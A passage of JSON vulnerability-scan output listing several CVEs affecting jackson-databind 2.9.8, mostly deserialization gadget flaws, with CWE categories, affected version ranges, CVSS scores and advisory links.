Mailing List","url":"https://lists.apache.org/thread.html/rdf311f13e6356297e0ffe74397fdd25a3687b0a16e687c3ff5b834d8@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdf8d389271a291dde3b2f99c36918d6cb1e796958af626cc140fee23@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re7326b8655eab931f2a9ce074fd9a1a51b5db11456bee9b48e1e170c@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/re8ae2670ec456ef1c5a2a661a2838ab2cd00e9efa1e88c069f546f21@%3Ccommits.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf28ab6f224b48452afd567dfffb705fbda0fdbbf6535f6bc69d47e91@%3Cdev.ranger.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rfc1ccfe89332155b72ce17f13a2701d3e7b9ec213324ceb90e79a28a@%3Cdev.ranger.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/02/msg00020.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-8840"},{"summary":"NetApp Advisory ntap-20200327-0002","url":"https://security.netapp.com/advisory/ntap-20200327-0002"},{"summary":"Oracle Advisory cpuapr2020","url":"https://www.oracle.com/security-alerts/cpuapr2020.html"},{"summary":"Oracle Advisory 
cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.3"]}],"title":"CVE-2020-8840/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36518"]}],"cve":"CVE-2020-36518","cwe":{"id":"787","name":"Out-of-bounds Write"},"discovery_date":"2022-03-12T00:00:36","ids":[{"system_name":"CVE Record","text":"CVE-2020-36518"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Debian Advisory","text":"dsa-5283"},{"system_name":"NetApp Advisory","text":"ntap-20220506-0004"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deeply nested json in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deeply nested json in jackson-databind jackson-databind is a data-binding package for the Jackson Data Processor. 
jackson-databind allows a Java stack overflow exception and denial of service via a large depth of nested objects."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/05/msg00001.html"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2022/11/msg00035.html"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36518"},{"summary":"NetApp Advisory ntap-20220506-0004","url":"https://security.netapp.com/advisory/ntap-20220506-0004"},{"summary":"Debian Advisory dsa-5283","url":"https://www.debian.org/security/2022/dsa-5283"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":7.5,"baseSeverity":"HIGH","confidentialityImpact":"NONE","environmentalScore":7.5,"environmentalSeverity":"HIGH","integrityImpact":"NONE","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"NONE","modifiedIntegrityImpact":"NONE","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":7.5,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<=2.9.9.3"]}],"title":"CVE-2020-36518/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https:
//nvd.nist.gov/vuln/detail/CVE-2020-11112"]}],"cve":"CVE-2020-11112","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-06-10T21:12:41","ids":[{"system_name":"CVE Record","text":"CVE-2020-11112"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.commons.proxy.provider.remoting.RmiProvider (aka apache/commons-proxy)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-11112"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory 
cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-11112/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2021-20190"]}],"cve":"CVE-2021-20190","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-01-20T21:20:15","ids":[{"system_name":"CVE Record","text":"CVE-2021-20190"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"NetApp Advisory","text":"ntap-20210219-0008"},{"system_name":"Red Hat Bugzilla","text":"redhat-bugzilla-1916633"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Deserialization of untrusted data in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Deserialization of 
untrusted data in jackson-databind A flaw was found in jackson-databind before 2.9.10.7 and 2.6.7.5. FasterXML mishandles the interaction between serialization gadgets and typing. The highest threat from this vulnerability is to data confidentiality and integrity as well as system availability."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.7"]},"references":[{"summary":"Red Hat Bugzilla","url":"https://bugzilla.redhat.com/show_bug.cgi?id=1916633"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r380e9257bacb8551ee6fcf2c59890ae9477b2c78e553fa9ea08e9d9a@%3Ccommits.nifi.apache.org%3E"},{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Cve 2021","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2021-20190"},{"summary":"NetApp Advisory ntap-20210219-0008","url":"https://security.netapp.com/advisory/ntap-20210219-0008"},{"summary":"Oracle Advisory 
cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.7"]}],"title":"CVE-2021-20190/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-9546"]}],"cve":"CVE-2020-9546","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:08:40","ids":[{"system_name":"CVE Record","text":"CVE-2020-9546"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200904-0006"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML 
jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to org.apache.hadoop.shaded.com.zaxxer.hikari.HikariConfig (aka shaded hikari-config)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r35d30db00440ef63b791c4b7f7acb036e14d4a23afa2a249cb66c0fd@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r893a0104e50c1c2559eb9a5812add28ae8c3e5f43712947a9847ec18@%3Cnotifications.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r9464a40d25c3ba1a55622db72f113eb494a889656962d098c70c5bb1@%3Cdev.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/r98c9b6e4c9e17792e2cd1ec3e4aa20b61a791939046d3f10888176bb@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rb6fecb5e96a6d61e175ff49f33f2713798dd05cf03067c169d195596@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rd5a4457be4623038c3989294429bc063eec433a2e55995d81591e2ca@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd49ab9565bec436a896bc00c4b9fc9dce1598e106c318524fbdfec6@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rdd4df698d5d8e635144d2994922bf0842e933809eae259521f3b5097@%3Cissues.zookeeper.apache.org%3E"},{"summary":"Apache Mailing List","url":"https://lists.apache.org/thread.html/rf1bbc0ea4a9f014cf94df9a12a6477d24a27f52741dbc87f2fd52ff2@%3Cissues.geode.apache.org%3E"},{"summary":"Debian Mailing 
List","url":"https://lists.debian.org/debian-lts-announce/2020/03/msg00008.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-9546"},{"summary":"NetApp Advisory ntap-20200904-0006","url":"https://security.netapp.com/advisory/ntap-20200904-0006"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":9.8,"baseSeverity":"CRITICAL","confidentialityImpact":"HIGH","environmentalScore":9.8,"environmentalSeverity":"CRITICAL","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":9.8,"temporalSeverity":"CRITICAL","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-9546/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-35728"]}],
"cve":"CVE-2020-35728","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:24","ids":[{"system_name":"CVE Record","text":"CVE-2020-35728"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210129-0007"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Serialization gadget exploit in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Serialization gadget exploit in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 mishandles the interaction between serialization gadgets and typing, related to com.oracle.wls.shaded.org.apache.xalan.lib.sql.JNDIConnectionPool (aka embedded Xalan in org.glassfish.web/javax.servlet.jsp.jstl)."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-35728"},{"summary":"NetApp Advisory 
ntap-20210129-0007","url":"https://security.netapp.com/advisory/ntap-20210129-0007"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.0.0|<2.9.10.8"]}],"title":"CVE-2020-35728/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-10969"]}],"cve":"CVE-2020-10969","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2020-04-23T21:36:03","ids":[{"system_name":"CVE Record","text":"CVE-2020-10969"},{"system_name":"Oracle Advisory","text":"cpujan2021"},{"system_name":"Oracle 
Advisory","text":"cpujul2020"},{"system_name":"Oracle Advisory","text":"cpuoct2020"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20200403-0002"},{"system_name":"Medium Advisory","text":"on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"jackson-databind mishandles the interaction between serialization gadgets and typing"},{"category":"details","details":"Vulnerability Details","text":"# jackson-databind mishandles the interaction between serialization gadgets and typing FasterXML jackson-databind 2.x before 2.9.10.4 mishandles the interaction between serialization gadgets and typing, related to javax.swing.JEditorPane."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.4"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2020/04/msg00012.html"},{"summary":"Medium Advisory on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062","url":"https://medium.com/@cowtowncoder/on-jackson-cves-dont-panic-here-is-what-you-need-to-know-54cd0d6e8062"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-10969"},{"summary":"NetApp Advisory ntap-20200403-0002","url":"https://security.netapp.com/advisory/ntap-20200403-0002"},{"summary":"Oracle Advisory cpujan2021","url":"https://www.oracle.com/security-alerts/cpujan2021.html"},{"summary":"Oracle Advisory cpujul2020","url":"https://www.oracle.com/security-alerts/cpujul2020.html"},{"summary":"Oracle Advisory cpuoct2020","url":"https://www.oracle.com/security-alerts/cpuoct2020.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"LOW","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.8,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.8,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"LOW","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"REQUIRED","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.8,"temporalSeverity":"HIGH","userInteraction":"REQUIRED","vectorString":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.9.0|<2.9.10.4"]}],"title":"CVE-2020-10969/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36182"]}],"cve":"CVE-2020-36182","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:15:46","ids":[{"system_name":"CVE Record","text":"CVE-2020-36182"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to org.apache.tomcat.dbcp.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36182"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
cpuoct2021","url":"https://www.oracle.com/security-alerts/cpuoct2021.html"}],"scores":[{"cvss_v3":{"attackComplexity":"HIGH","attackVector":"NETWORK","availabilityImpact":"HIGH","baseScore":8.1,"baseSeverity":"HIGH","confidentialityImpact":"HIGH","environmentalScore":8.1,"environmentalSeverity":"HIGH","integrityImpact":"HIGH","modifiedAttackComplexity":"HIGH","modifiedAttackVector":"NETWORK","modifiedAvailabilityImpact":"HIGH","modifiedConfidentialityImpact":"HIGH","modifiedIntegrityImpact":"HIGH","modifiedPrivilegesRequired":"NONE","modifiedScope":"UNCHANGED","modifiedUserInteraction":"NONE","privilegesRequired":"NONE","scope":"UNCHANGED","temporalScore":8.1,"temporalSeverity":"HIGH","userInteraction":"NONE","vectorString":"CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H","version":"3.1"},"products":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"]}],"title":"CVE-2020-36182/pkg:maven/com.fasterxml.jackson.core/jackson-databind@2.9.8?type=jar"},{"acknowledgements":[{"organization":"NVD","urls":["https://nvd.nist.gov/vuln/detail/CVE-2020-36180"]}],"cve":"CVE-2020-36180","cwe":{"id":"502","name":"Deserialization of Untrusted Data"},"discovery_date":"2021-12-09T19:16:18","ids":[{"system_name":"CVE Record","text":"CVE-2020-36180"},{"system_name":"Oracle Advisory","text":"cpuApr2021"},{"system_name":"Oracle Advisory","text":"cpuapr2022"},{"system_name":"Oracle Advisory","text":"cpujan2022"},{"system_name":"Oracle Advisory","text":"cpujul2021"},{"system_name":"Oracle Advisory","text":"cpujul2022"},{"system_name":"Oracle Advisory","text":"cpuoct2021"},{"system_name":"NetApp Advisory","text":"ntap-20210205-0005"}],"notes":[{"category":"description","details":"Vulnerability Description","text":"Unsafe Deserialization in jackson-databind"},{"category":"details","details":"Vulnerability Details","text":"# Unsafe Deserialization in jackson-databind FasterXML jackson-databind 2.x before 2.9.10.8 and 2.6.7.5 mishandles the interaction between 
serialization gadgets and typing, related to org.apache.commons.dbcp2.cpdsadapter.DriverAdapterCPDS."}],"product_status":{"known_affected":["com.fasterxml.jackson.core/jackson-databind@vers:maven/>=2.7.0|<2.9.10.8"],"known_not_affected":["com.fasterxml.jackson.core/jackson-databind@2.9.10.8"]},"references":[{"summary":"Debian Mailing List","url":"https://lists.debian.org/debian-lts-announce/2021/04/msg00025.html"},{"summary":"CVE Record","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"Cve 2020","url":"https://nvd.nist.gov/vuln/detail/CVE-2020-36180"},{"summary":"NetApp Advisory ntap-20210205-0005","url":"https://security.netapp.com/advisory/ntap-20210205-0005"},{"summary":"Oracle Advisory cpujul2021","url":"https://www.oracle.com//security-alerts/cpujul2021.html"},{"summary":"Oracle Advisory cpuApr2021","url":"https://www.oracle.com/security-alerts/cpuApr2021.html"},{"summary":"Oracle Advisory cpuapr2022","url":"https://www.oracle.com/security-alerts/cpuapr2022.html"},{"summary":"Oracle Advisory cpujan2022","url":"https://www.oracle.com/security-alerts/cpujan2022.html"},{"summary":"Oracle Advisory cpujul2022","url":"https://www.oracle.com/security-alerts/cpujul2022.html"},{"summary":"Oracle Advisory 
